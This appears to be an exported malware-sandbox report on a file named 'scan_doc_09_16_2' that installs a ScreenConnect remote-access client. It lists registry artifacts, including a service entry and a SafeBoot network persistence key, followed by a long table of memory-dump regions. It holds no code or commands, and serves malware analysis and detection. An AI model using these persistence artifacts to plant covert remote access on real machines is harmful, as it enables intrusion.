HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Files
ScreenConnect.Core.dll_963930cc5ced28c7
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files
ScreenConnect.Client.dll_7b0ea606092ddbcb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
SubstructureCreated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
ProgramId
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
FileId
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
LowerCaseLongPath
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
LongPathHash
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
Name
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
OriginalFileName
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
Publisher
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
Version
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
BinFileVersion
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
BinaryType
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
ProductName
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
ProductVersion
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
LinkDate
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
BinProductVersion
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
AppxPackageFullName
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
AppxPackageRelativeId
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
Size
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
Language
\REGISTRY\A\{c8bac1e1-9b0d-221c-d960-8fe867620b81}\Root\InventoryApplicationFile\scan_doc_09_16_2|56c70fa0e694fe8b
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
lock!0e00000050234d00f81c0000fc1c00000000000000000000a2261de28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
lock!0c00000050234d00f81c0000fc1c00000000000000000000a2261de28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
lock!0a00000050234d00f81c0000fc1c00000000000000000000a2261de28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
lock!0800000050234d00f81c0000fc1c00000000000000000000a2261de28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
lock!0600000050234d00f81c0000fc1c00000000000000000000a2261de28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
lock!0400000050234d00f81c0000fc1c00000000000000000000a2261de28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
lock!0200000050234d00f81c0000fc1c00000000000000000000a2261de28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
lock!1c00000060234d00f81c0000fc1c0000000000000000000012891fe28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
lock!1a00000060234d00f81c0000fc1c0000000000000000000012891fe28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
lock!1800000060234d00f81c0000fc1c0000000000000000000012891fe28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
lock!1600000060234d00f81c0000fc1c0000000000000000000012891fe28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
lock!1400000060234d00f81c0000fc1c0000000000000000000012891fe28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
lock!1200000060234d00f81c0000fc1c0000000000000000000012891fe28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
lock!1000000060234d00f81c0000fc1c0000000000000000000012891fe28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
lock!1d0000006f234d00f81c0000fc1c000000000000000000009aeb21e28114db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_188970e3844df7b6
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_d0aeae01f8c2b957
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
HasRunBefore
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (e76a7089-9bd3-460c-8e9c-7b01b18dcd91)
NULL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e76a7089-9bd3-460c-8e9c-7b01b18dcd91)
ImagePath
There are 175 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
120E000
stack
page read and write
261F6ED0000
heap
page read and write
2E11000
trusted library allocation
page read and write
13D8E2C2000
heap
page read and write
102000
unkown
page readonly
26180180000
trusted library allocation
page read and write
261F9930000
heap
page read and write
20FF2600000
heap
page read and write
1BBC1000
heap
page read and write
1D874000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
21A0000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
5EB000
unkown
page readonly
261F99B4000
heap
page read and write
261F9AB7000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
1C5CD000
stack
page read and write
4C1E000
stack
page read and write
7FFD9B929000
trusted library allocation
page read and write
261F9AC2000
heap
page read and write
261F99BC000
heap
page read and write
7FFD9B753000
trusted library allocation
page execute and read and write
C1D000
unkown
page readonly
13D88C80000
heap
page read and write
261802DB000
trusted library allocation
page read and write
4CED000
stack
page read and write
1FBB000
trusted library allocation
page read and write
7FFD9B793000
trusted library allocation
page read and write
115A000
heap
page read and write
20FF242B000
heap
page read and write
261F5310000
heap
page read and write
4349000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
7FFD9B790000
trusted library allocation
page read and write
4C50000
trusted library allocation
page execute and read and write
1430000
heap
page read and write
18ED37B000
stack
page read and write
13D88E8C000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
489E000
stack
page read and write
7FFD9B9B8000
trusted library allocation
page read and write
13D88C60000
heap
page read and write
261901EB000
trusted library allocation
page read and write
18EE27D000
stack
page read and write
1ABDE000
heap
page read and write
7FFD9B7A4000
trusted library allocation
page read and write
1740000
trusted library allocation
page read and write
261F776F000
heap
page read and write
1990000
heap
page execute and read and write
1050000
heap
page read and write
7FFD9B7DC000
trusted library allocation
page execute and read and write
57A0000
unkown
page readonly
1620000
trusted library allocation
page read and write
261F9995000
heap
page read and write
94EFA79000
stack
page read and write
261F5420000
heap
page read and write
33DF000
trusted library allocation
page read and write
1760000
heap
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
7FFD9BAB0000
trusted library allocation
page read and write
261F9404000
heap
page read and write
1CAAD000
stack
page read and write
1D00000
heap
page execute and read and write
13D89D70000
trusted library allocation
page read and write
13D8E590000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1780000
trusted library allocation
page read and write
148C000
heap
page read and write
1191000
stack
page read and write
13D8E496000
trusted library allocation
page read and write
261F77B9000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9BAEA000
trusted library allocation
page read and write
DF0000
heap
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
1BCB0000
heap
page read and write
3322000
unkown
page readonly
8E0000
heap
page read and write
13D88E40000
heap
page read and write
3340000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
4797000
trusted library allocation
page read and write
2618066B000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
13D89E90000
trusted library section
page readonly
137E000
stack
page read and write
7FFD9BB60000
trusted library allocation
page read and write
13D88EBD000
heap
page read and write
1AC76000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
47A0000
trusted library allocation
page read and write
2618026E000
trusted library allocation
page read and write
7FFD9B937000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
13D89713000
heap
page read and write
7FFD9B96C000
trusted library allocation
page read and write
18ED77E000
unkown
page readonly
7FFD9BC50000
trusted library allocation
page read and write
1767000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
5F1000
unkown
page write copy
20FF2280000
heap
page read and write
4C30000
trusted library allocation
page read and write
35D5000
trusted library allocation
page read and write
21A8000
trusted library allocation
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
261802F8000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
4780000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page execute and read and write
145E000
stack
page read and write
13341000
trusted library allocation
page read and write
10D4000
heap
page read and write
1BFBE000
stack
page read and write
7FFD9B976000
trusted library allocation
page read and write
67F000
heap
page read and write
1030000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page execute and read and write
C10000
unkown
page readonly
20FF2500000
trusted library allocation
page read and write
7FFD9BAD2000
trusted library allocation
page read and write
261F7820000
heap
page read and write
7FFD9B8F8000
trusted library allocation
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9B935000
trusted library allocation
page read and write
F5030FE000
stack
page read and write
26180673000
trusted library allocation
page read and write
14B8000
heap
page read and write
1755000
trusted library allocation
page execute and read and write
261F55B0000
trusted library allocation
page read and write
7FFD9B784000
trusted library allocation
page read and write
13D0000
heap
page read and write
261F9250000
heap
page read and write
261F94C5000
heap
page read and write
1C050000
heap
page read and write
261F99E8000
heap
page read and write
56A0000
trusted library allocation
page read and write
12E41000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
F502CF3000
stack
page read and write
570000
heap
page read and write
261F7D5F000
heap
page read and write
1465000
heap
page read and write
49DE000
stack
page read and write
261F9ABD000
heap
page read and write
7FFD9B97E000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
1B840000
heap
page execute and read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
7FFD9BB70000
trusted library allocation
page read and write
26180077000
trusted library allocation
page read and write
20FF2524000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
26180622000
trusted library allocation
page read and write
26180081000
trusted library allocation
page read and write
1025000
heap
page read and write
7FFD9B996000
trusted library allocation
page read and write
F50377A000
stack
page read and write
13D8E2F8000
heap
page read and write
5FD000
heap
page read and write
7FFD9B969000
trusted library allocation
page read and write
100E000
stack
page read and write
261F6E70000
heap
page execute and read and write
13BC000
stack
page read and write
5B9000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
18EE8FE000
stack
page read and write
13D89C50000
trusted library allocation
page read and write
13D88E8F000
heap
page read and write
F5034FD000
stack
page read and write
1B3AD000
stack
page read and write
3245000
trusted library allocation
page read and write
7FFD9B921000
trusted library allocation
page read and write
1C30000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
5E0000
unkown
page readonly
8A0000
trusted library allocation
page read and write
182E000
stack
page read and write
5E7C000
stack
page read and write
261F7D53000
heap
page read and write
5960000
trusted library allocation
page read and write
1C0A2000
heap
page read and write
261902E2000
trusted library allocation
page read and write
261804BD000
trusted library allocation
page read and write
261F7010000
heap
page execute and read and write
5700000
heap
page execute and read and write
18ED6FE000
stack
page read and write
63D000
heap
page read and write
261F9B1B000
heap
page read and write
F50353E000
stack
page read and write
5F3000
unkown
page readonly
261F94C8000
heap
page read and write
261F9B0B000
heap
page read and write
1B7EE000
stack
page read and write
261F9A20000
heap
page read and write
1227000
heap
page read and write
13BE000
heap
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
18EC97E000
unkown
page readonly
F5031FB000
stack
page read and write
7FFD9B93E000
trusted library allocation
page read and write
1B10E000
stack
page read and write
1AC2A000
heap
page read and write
219E000
trusted library allocation
page read and write
12E30000
trusted library allocation
page read and write
580C000
stack
page read and write
13D8E580000
trusted library allocation
page read and write
355E000
stack
page read and write
13D8E458000
trusted library allocation
page read and write
18ED7FE000
stack
page read and write
261F9B26000
heap
page read and write
261F76E0000
heap
page read and write
261F5630000
heap
page read and write
261F9AAB000
heap
page read and write
261F7020000
trusted library allocation
page read and write
261F94A9000
heap
page read and write
261F534E000
heap
page read and write
13D89615000
heap
page read and write
18ED97E000
unkown
page readonly
34F3000
trusted library allocation
page read and write
261F5352000
heap
page read and write
3334000
unkown
page readonly
7FFD9BAF0000
trusted library allocation
page read and write
36BF000
trusted library allocation
page read and write
1C660000
heap
page read and write
13D89702000
heap
page read and write
1750000
trusted library allocation
page read and write
5E1000
unkown
page execute read
2618083A000
trusted library allocation
page read and write
5BD0000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
13D8E441000
trusted library allocation
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
261F7810000
trusted library section
page readonly
1BC30000
heap
page execute and read and write
35E3000
trusted library allocation
page read and write
1ABF4000
heap
page read and write
13D8E430000
trusted library allocation
page read and write
7FFD9B963000
trusted library allocation
page read and write
261F94CA000
heap
page read and write
261806F1000
trusted library allocation
page read and write
1B350000
unkown
page readonly
17E0000
trusted library allocation
page read and write
FC0000
heap
page read and write
20FF2439000
heap
page read and write
147C000
heap
page read and write
1336F000
trusted library allocation
page read and write
1ABEE000
heap
page read and write
261F9B05000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
22E1000
trusted library allocation
page read and write
1BB50000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
1C092000
heap
page read and write
22EF000
trusted library allocation
page read and write
1C2E000
stack
page read and write
13D88E2B000
heap
page read and write
7FFD9B790000
trusted library allocation
page read and write
2E21000
trusted library allocation
page read and write
7FFD9B95D000
trusted library allocation
page read and write
261F9A3F000
heap
page read and write
261F7800000
heap
page read and write
18ED179000
stack
page read and write
7FFD9BB40000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
F80000
heap
page read and write
26180524000
trusted library allocation
page read and write
7FFD9B7DC000
trusted library allocation
page execute and read and write
17AD000
trusted library allocation
page execute and read and write
173D000
trusted library allocation
page execute and read and write
7FFD9BB40000
trusted library allocation
page read and write
1C9A0000
heap
page read and write
1AE6E000
stack
page read and write
7FFD9B793000
trusted library allocation
page read and write
F503B7D000
stack
page read and write
5580000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
13B0000
heap
page read and write
13D88EAF000
heap
page read and write
10EF000
heap
page read and write
18EDA7B000
stack
page read and write
5970000
trusted library allocation
page read and write
13D88EB3000
heap
page read and write
4306000
trusted library allocation
page read and write
1720000
heap
page read and write
18EE07B000
stack
page read and write
1840000
heap
page read and write
13D89602000
heap
page read and write
1BBCC000
heap
page read and write
261F941E000
heap
page read and write
261F7CF0000
heap
page read and write
4CA0000
trusted library allocation
page execute and read and write
1AC49000
heap
page read and write
1400000
heap
page read and write
261F99A5000
heap
page read and write
13D8E480000
trusted library allocation
page read and write
607000
heap
page read and write
261F776B000
heap
page read and write
1BA99000
heap
page read and write
19D0000
heap
page read and write
261F8E72000
trusted library allocation
page read and write
135E000
stack
page read and write
7FFD9B970000
trusted library allocation
page read and write
261F929D000
heap
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
1476000
heap
page read and write
1472000
heap
page read and write
7FFD9B7A4000
trusted library allocation
page read and write
5F5000
heap
page read and write
261F9A1E000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
11AB000
heap
page read and write
3320000
unkown
page readonly
7FFD9B9E0000
trusted library allocation
page read and write
261F5600000
trusted library allocation
page read and write
13D8E200000
heap
page read and write
14B4000
heap
page read and write
4B1D000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
20FF2400000
unkown
page read and write
1AC0E000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
18EDCFE000
stack
page read and write
1AD30000
unkown
page readonly
1C760000
heap
page read and write
13D8E48D000
trusted library allocation
page read and write
3290000
heap
page read and write
18EDB7E000
unkown
page readonly
1ABC7000
heap
page read and write
1BB62000
heap
page read and write
1BBA7000
heap
page read and write
7FFD9B9F3000
trusted library allocation
page read and write
26180079000
trusted library allocation
page read and write
1AD32000
unkown
page readonly
7FFD9B930000
trusted library allocation
page read and write
7FFD9BC40000
trusted library allocation
page execute and read and write
44E3000
heap
page read and write
20FF2713000
heap
page read and write
261F99FB000
heap
page read and write
7FFD9B7AB000
trusted library allocation
page execute and read and write
3350000
heap
page read and write
11E0000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
15CE000
stack
page read and write
1AF00000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
7FFD9B933000
trusted library allocation
page read and write
20FF2713000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
557B000
stack
page read and write
13D89700000
heap
page read and write
63F000
heap
page read and write
12E2C000
trusted library allocation
page read and write
68B000
heap
page read and write
1BEBF000
stack
page read and write
13D8E24F000
heap
page read and write
26180354000
trusted library allocation
page read and write
1117000
heap
page read and write
18EE37E000
unkown
page readonly
1AC1D000
heap
page read and write
7FFD9B77B000
trusted library allocation
page execute and read and write
56E0000
trusted library allocation
page read and write
1150000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
17C2000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page execute and read and write
69C000
heap
page read and write
1752000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
1C638000
stack
page read and write
2618064F000
trusted library allocation
page read and write
10D2000
heap
page read and write
261F5395000
heap
page read and write
261F93F0000
heap
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
3E4E000
stack
page read and write
10CE000
heap
page read and write
5D7E000
stack
page read and write
19A0000
trusted library allocation
page read and write
F503634000
stack
page read and write
261F9A7A000
heap
page read and write
1BBAF000
heap
page read and write
7FFD9B7DC000
trusted library allocation
page execute and read and write
EFC000
stack
page read and write
1737000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
C24000
unkown
page write copy
123AF000
trusted library allocation
page read and write
261F9277000
heap
page read and write
18ED27E000
unkown
page readonly
13D895E1000
trusted library allocation
page read and write
7FFD9B9EE000
trusted library allocation
page read and write
5D20000
trusted library allocation
page execute and read and write
35F7000
trusted library allocation
page read and write
261F9935000
heap
page read and write
1000000
heap
page read and write
1757000
trusted library allocation
page execute and read and write
13F0000
trusted library section
page read and write
1783000
trusted library allocation
page read and write
4C70000
trusted library allocation
page read and write
13D8E590000
trusted library allocation
page read and write
261F7775000
heap
page read and write
32BE000
stack
page read and write
1700000
heap
page read and write
194E000
stack
page read and write
1478000
heap
page read and write
261F5590000
trusted library allocation
page read and write
18ED67E000
unkown
page readonly
261F7805000
heap
page read and write
1B8AC000
stack
page read and write
45C0000
trusted library allocation
page execute and read and write
13D8E221000
heap
page read and write
13D88F29000
heap
page read and write
7FFD9B9F5000
trusted library allocation
page read and write
7FFD9BA19000
trusted library allocation
page read and write
1D860000
heap
page read and write
261805C5000
trusted library allocation
page read and write
13D89600000
heap
page read and write
1BC70000
trusted library allocation
page read and write
3351000
trusted library allocation
page read and write
B7B000
stack
page read and write
7FFD9BB70000
trusted library allocation
page read and write
261F9972000
heap
page read and write
8E3000
heap
page read and write
BE0000
heap
page read and write
7FFD9BB60000
trusted library allocation
page read and write
5980000
trusted library allocation
page read and write
167F000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
13D8971B000
heap
page read and write
26190001000
trusted library allocation
page read and write
13D8E211000
heap
page read and write
261803AA000
trusted library allocation
page read and write
2397000
trusted library allocation
page read and write
261F5540000
heap
page read and write
4440000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1BA80000
trusted library allocation
page read and write
1B92E000
stack
page read and write
261F9AE3000
heap
page read and write
17C0000
trusted library allocation
page read and write
1E0F000
stack
page read and write
26180663000
trusted library allocation
page read and write
261F53D2000
heap
page read and write
7FFD9B7AB000
trusted library allocation
page execute and read and write
1750000
trusted library allocation
page read and write
26180248000
trusted library allocation
page read and write
18ECC7E000
unkown
page readonly
1423000
trusted library allocation
page execute and read and write
22DE000
stack
page read and write
20FF2515000
trusted library allocation
page read and write
261F7860000
heap
page execute and read and write
7FFD9B940000
trusted library allocation
page read and write
10FD000
stack
page read and write
365F000
stack
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
13D89C60000
trusted library allocation
page read and write
165D000
heap
page read and write
87F000
stack
page read and write
261F7769000
heap
page read and write
1BA2E000
stack
page read and write
5EB000
unkown
page readonly
7FFD9B79D000
trusted library allocation
page execute and read and write
5D1A000
stack
page read and write
2E10000
heap
page read and write
F4C000
stack
page read and write
11EB000
heap
page read and write
7FFD9B99B000
trusted library allocation
page read and write
1ABC1000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
261F7863000
heap
page execute and read and write
261F99A0000
heap
page read and write
319E000
stack
page read and write
100000
unkown
page readonly
F50367E000
stack
page read and write
7FFD9B9C3000
trusted library allocation
page read and write
13D88E5B000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
13330000
trusted library allocation
page read and write
4350000
trusted library allocation
page read and write
26180667000
trusted library allocation
page read and write
45D0000
unkown
page readonly
BF0000
heap
page read and write
7FFD9B984000
trusted library allocation
page read and write
2DF0000
trusted library section
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
20FF2702000
heap
page read and write
1ABB0000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
261F9A02000
heap
page read and write
7FFD9B800000
trusted library allocation
page read and write
4321000
trusted library allocation
page read and write
14F5000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
13D8E2CA000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
17C5000
trusted library allocation
page execute and read and write
2D6E000
stack
page read and write
434B000
trusted library allocation
page read and write
21A6000
trusted library allocation
page read and write
374C000
trusted library allocation
page read and write
18EC29B000
stack
page read and write
7FFD9B774000
trusted library allocation
page read and write
4C80000
trusted library allocation
page read and write
F503F7D000
stack
page read and write
5E1000
heap
page read and write
7FFD9B96F000
trusted library allocation
page read and write
1BBAD000
heap
page read and write
151F000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
261F77B7000
heap
page read and write
10B6000
heap
page read and write
18EDC7E000
unkown
page readonly
12F8000
stack
page read and write
18EC877000
stack
page read and write
7FFD9B930000
trusted library allocation
page read and write
261F77D5000
heap
page read and write
26180274000
trusted library allocation
page read and write
1AC61000
heap
page read and write
C24000
unkown
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
5D30000
trusted library allocation
page read and write
7FFD9B806000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
194F000
stack
page read and write
1BBB3000
heap
page read and write
1B110000
unkown
page readonly
13D8E484000
trusted library allocation
page read and write
7FFD9B784000
trusted library allocation
page read and write
35F1000
trusted library allocation
page read and write
47C0000
trusted library allocation
page read and write
1BB56000
heap
page read and write
5ACD000
stack
page read and write
7FFD9B750000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1E11000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page read and write
1AC69000
heap
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
5F1000
unkown
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
31B5000
trusted library allocation
page read and write
7FFD9BA77000
trusted library allocation
page read and write
26180085000
trusted library allocation
page read and write
7FFD9B7AC000
trusted library allocation
page execute and read and write
261807C5000
trusted library allocation
page read and write
57A2000
unkown
page readonly
1BA30000
unkown
page readonly
F5033F8000
stack
page read and write
13D88F02000
heap
page read and write
2618055E000
trusted library allocation
page read and write
175B000
trusted library allocation
page execute and read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B784000
trusted library allocation
page read and write
13D8971A000
heap
